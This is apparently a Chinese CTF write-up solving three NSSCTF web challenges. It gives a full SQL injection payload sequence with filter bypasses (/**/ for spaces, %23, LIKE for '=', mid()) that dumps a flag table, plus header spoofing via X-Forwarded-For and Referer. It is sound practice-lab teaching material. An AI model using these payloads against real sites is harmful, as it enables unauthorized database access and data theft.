目录
[SWPUCTF 2021 新生赛]sql
1、题目
2、知识点
3、思路
[SWPUCTF 2022 新生赛]xff
1、题目
2、知识点
3、思路
[FSCTF 2023]源码!启动!
1、题目
2、知识点
3、思路
[SWPUCTF 2021 新生赛]sql
1、题目
2、知识点
SQL注入,空格、注释符等绕过
3、思路
打开题目
根据提示可以知道,变量是wllm
?wllm=1
数据回显,加入单引号’
?wllm=1'
数据库语句报错,根据提示信息,我们可以猜测是单引号的闭合问题
输入注释符--+ #,
说明注释符被过滤,这时候我们考虑绕过,可以使用url编码进行绕过,#为%23,--+编码后还是被过滤,所以不行,在尝试的过程中,发现空格也被过滤,空格绕过有很多种,根据题目而定,这里可以使用注释进行绕过/**/
常见的空格绕过还有:
两个空格代替一个空格
%a0
使用()等
?wllm=1'/**/%23
这里数据正常回显,说明是单引号的闭合错误,同时也绕过了空格、注释符的过滤,接下来的语句空格都用/**/代替
判断回显位置(注意wllm是-1,因为使用union语句,前面为空,才会执行后面的语句)
?wllm=-1'/**/union/**/select/**/1,2,3%23
判断数据库
?wllm=-1'/**/union/**/select/**/1,2,database()%23
当前数据库为test_db
判断表名
这里发现=也被过滤了,可以使用like来进行绕过
?wllm=-1'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**
/information_schema.tables/**/where/**/table_schema/**/like/**/'test_db'%23
判断字段名
?wllm=-1'/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'LTLT_flag'%23
判断flag
这里因为字符长度的显示,需要使用mid()函数
?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(id,flag),1,20)/**/from/**/test_db.LTLT_flag%23
?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(id,flag),20,40)/**/from/**/test_db.LTLT_flag%23
?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(id,flag),40,60)/**/from/**/test_db.LTLT_flag%23
注意,这些字符需要注意不要重复
得到flag:NSSCTF{2d6117ae-ea77-425d-850e-88a53030a9e8}
[SWPUCTF 2022 新生赛]xff
1、题目
2、知识点
http头部,xff
3、思路
这一题跟 [LitCTF 2023]Http pro max plus有一点相似,可以参考
NSSCTF-Web题目8-CSDN博客
这里提示我们要使用自己的电脑,估计就要本地IP,打开BP进行抓包,修改头部
加上X-forwarded-for:127.0.0.1
这里提示我们要从home页面访问
加上Referer:home
得到flag:NSSCTF{th1s_xff_1s_e4ay}
[FSCTF 2023]源码!启动!
1、题目
2、知识点
源码获取,开发者模式使用
3、思路
打开题目
没有什么提示信息,右键查看源码,发现右键被禁用
使用浏览器
得到flag:NSSCTF{fbb98d46-c9b4-4161-b43e-544459962400}
